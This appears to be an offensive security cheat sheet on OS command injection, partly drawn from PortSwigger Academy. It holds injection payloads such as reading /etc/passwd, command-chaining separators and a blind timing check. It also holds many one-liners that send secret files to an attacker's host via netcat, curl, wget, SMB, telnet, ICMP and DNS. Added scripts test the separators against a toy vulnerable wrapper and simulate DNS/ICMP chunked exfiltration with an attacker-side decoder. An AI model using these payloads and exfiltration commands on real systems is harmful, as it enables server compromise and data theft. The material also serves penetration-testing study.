OS command injection

From PortSwigger Academy

Description

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.

Resources

How to inject

  • Basic commands

cat /etc/passwd
  • Chaining commands

original_cmd_by_server; ls      Runs ls unconditionally, after the original command
original_cmd_by_server && ls    Runs ls only if the original command succeeds
original_cmd_by_server | ls     Runs both; the original command's output is piped into ls
original_cmd_by_server || ls    Runs ls only if the original command fails
  • Command substitution inside an argument

original_cmd_by_server `cat /etc/passwd`
original_cmd_by_server $(cat /etc/passwd)    Both forms are still evaluated inside double quotes, where ; and && would be literal

Blind OS command injection

Confirm the injection

& ping -c 10 127.0.0.1 &    Nothing is echoed back, so use a delay: ten pings take about ten seconds, and a response that slow shows the command ran
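The separators and command-substitution forms above, and the timing check for the blind case, as an added example that is not from the PortSwigger page: a toy wrapper that pastes user input into `sh -c` the way a vulnerable handler does, next to a hardened version, with a probe that fires each separator and a timer for the blind sink. The function names, the fake `result for` command and every input are constructed; `sleep` stands in for the page's `ping -c 10` so the demo stays short.

```shell
#!/bin/sh
# Added example (not from the PortSwigger page). vulnerable_run and
# vulnerable_run_failing build a shell string from their argument exactly
# the way a vulnerable web handler does; safe_run is the hardened form.
# All names, the "result for" command and the inputs are constructed.

# Vulnerable: the argument is interpolated into a string that sh parses,
# so ; && | || ` and $( ) inside it are honoured as shell syntax.
vulnerable_run() {
    sh -c "echo result for $1"
}

# Same flaw, but the legitimate command fails, which is when "||" fires.
vulnerable_run_failing() {
    sh -c "ls /nonexistent/$1" 2>/dev/null
}

# Hardened: reject anything outside an allowlist, then pass the value as
# one quoted argument so no shell ever re-parses it.
safe_run() {
    case "$1" in
        ''|*[!A-Za-z0-9.-]*)
            printf 'rejected: %s\n' "$1" >&2
            return 1 ;;
    esac
    printf 'result for %s\n' "$1"
}

# Fire each separator from the cheat sheet at both vulnerable wrappers and
# report (1/0) whether the injected "echo INJECTED" ran.
probe() {
    for sep in ';' '&&' '|' '||'; do
        p="x $sep echo INJECTED"
        r1=$(vulnerable_run "$p" | grep -c INJECTED || true)
        r2=$(vulnerable_run_failing "$p" | grep -c INJECTED || true)
        printf '%-3s ok-cmd:%s failing-cmd:%s\n' "$sep" "$r1" "$r2"
    done
}

# Blind sink: output is captured and thrown away, so nothing is reflected.
blind_run() {
    out=$(sh -c "true $1" 2>&1)
}

# Time the blind sink with a payload in the page's "& ... &" form. Both
# halves are backgrounded, yet the call still stalls: the injected command
# inherits the captured stdout and the sink reads until that pipe closes,
# so the delay is the signal (the page uses ping -c 10; sleep is shorter).
blind_elapsed() {
    start=$(date +%s)
    blind_run "$1"
    echo $(( $(date +%s) - start ))
}

probe
echo "baseline: $(blind_elapsed '& true &')s   delayed: $(blind_elapsed '& sleep 2 &')s"
```

The probe table shows why `||` is listed with a caveat: against a command that succeeds only `;`, `&&` and `|` fire, while against one that fails `&&` goes quiet and `||` lights up, so when nothing comes back try more than one separator before concluding the sink is not injectable.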

Data exfiltration

  • using netcat listener

#linux (run on the target: serves the file to whoever connects to {port})
nc -lp {port} < {file/to/extract}

#windows (same idea; -L keeps the listener open after a client disconnects)
type {file to extract} | nc -L -p {port}
  • using cURL

#post to webserver (file is sent as a multipart form field named "data", read from stdin)
cat /path/to/file | curl -F "data=@-" http://<ip>:<port>/test.txt

#transfer to ftp
curl -T {path to file} ftp://xxx.xxx.xxx.xxx --user {user}:{password}
  • using wget

wget --header="EVIL:$(cat /data/secret/password.txt)" http://<ip>:<port>    Leaks the file in a request header
wget --post-data "exfil=$(cat /data/secret/secretcode.txt)" http://<ip>:<port>    Leaks it in the POST body
wget --post-file trophy.php http://<ip>:<port>    Sends the whole file as the POST body
  • using SMB

#on Windows (mounts the attacker's share, then copies the file onto it)
net use h: \\<ip>\web /user:{user} {password} && copy {File to Copy} h:\(unknown).txt
  • using telnet

telnet <ip> {port} < {file to transfer}
  • using icmp

#on Linux (ping -p takes at most 16 bytes of payload pattern, hence 16-byte hex chunks and one echo request per chunk)
cat password.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done

#In Wireshark on the receiving host the data shows up in the ICMP payloads. A script that scrapes the packets in order and hex-decodes them re-assembles the file
  • using DNS

cat /data/secret/password.txt | xxd -p -c 16 | while read exfil; do host $exfil.contextis.com 192.168.107.135; done

#Each chunk becomes a subdomain label; the second argument to host sends the query straight to the attacker's name server (192.168.107.135 here), which sees one query per chunk. Scrape the query names and hex-decode the labels to re-assemble the file
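The ICMP and DNS loops above, as an added example that is not from the page: the sender's chunking simulated locally with od/awk standing in for xxd, plus the receiver-side re-assembly script the page says you could write. The zone `exfil.example`, the secret `hunter2` and the captured query list are all constructed; nothing is transmitted.

```shell
#!/bin/sh
# Added example (not from the page). The page's ICMP and DNS loops both
# turn a file into fixed-width hex chunks and send one chunk per packet;
# this simulates that sender side and adds the receiver-side re-assembly
# the page leaves as "write a script". od/awk replace xxd so it runs on
# minimal images; nothing is transmitted. The zone, the secret and the
# captured query list are all constructed for the demo.

EXFIL_DOMAIN="exfil.example"   # assumed attacker-controlled zone

# hex_chunks WIDTH: stdin -> lowercase hex, WIDTH bytes per line, i.e. what
# "xxd -p -c WIDTH" produces. ping -p accepts at most 16 bytes of pattern,
# which is why the page uses -c 16 (32 hex digits per chunk).
hex_chunks() {
    od -A n -v -t x1 | tr -d ' \n' | fold -w $(( $1 * 2 ))
    echo    # fold leaves the last chunk unterminated; while-read loops need the newline
}

# Sender side for the DNS variant: the names the `host` loop would resolve.
# build_queries WIDTH reads the secret from stdin.
build_queries() {
    hex_chunks "$1" | sed "/./s/\$/.$EXFIL_DOMAIN/"
}

# Receiver side: from a list of query names seen by the attacker's resolver
# (stdin, one per line, e.g. a dns.qry.name column exported from Wireshark),
# keep only labels under our zone, strip the zone, join the hex in arrival
# order and decode it. LC_ALL=C makes awk write bytes >= 0x80 as-is.
reassemble() {
    esc=$(printf '%s' "$EXFIL_DOMAIN" | sed 's/\./\\./g')
    sed -n "s/^\\([0-9a-f]*\\)\\.$esc\\.\\{0,1\\}\$/\\1/p" \
    | LC_ALL=C awk 'BEGIN { h = "0123456789abcdef" }
                    { s = s $0 }
                    END { for (i = 1; i <= length(s); i += 2) printf "%c", (index(h, substr(s, i, 1)) - 1) * 16 + index(h, substr(s, i + 1, 1)) - 1 }'
}

# Constructed capture: what the attacker's name server logged, in arrival
# order, with unrelated lookups (and a trailing-dot FQDN) mixed in.
captured_queries() {
    cat <<'EOF'
www.example.org
68756e74.exfil.example
6572320a.exfil.example.
time.example.net
EOF
}

echo "# target would send:"
printf 'hunter2\n' | build_queries 4
echo "# attacker recovers:"
captured_queries | reassemble
```

The same `hex_chunks` output is what the ICMP loop feeds to `ping -p`, so the decoder above works on scraped ICMP payloads too. One caveat a real run needs: resolvers cache and may reorder queries, so prefix each label with a sequence number before the hex and sort on it at the receiver; the demo relies on arrival order only because the capture is constructed.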
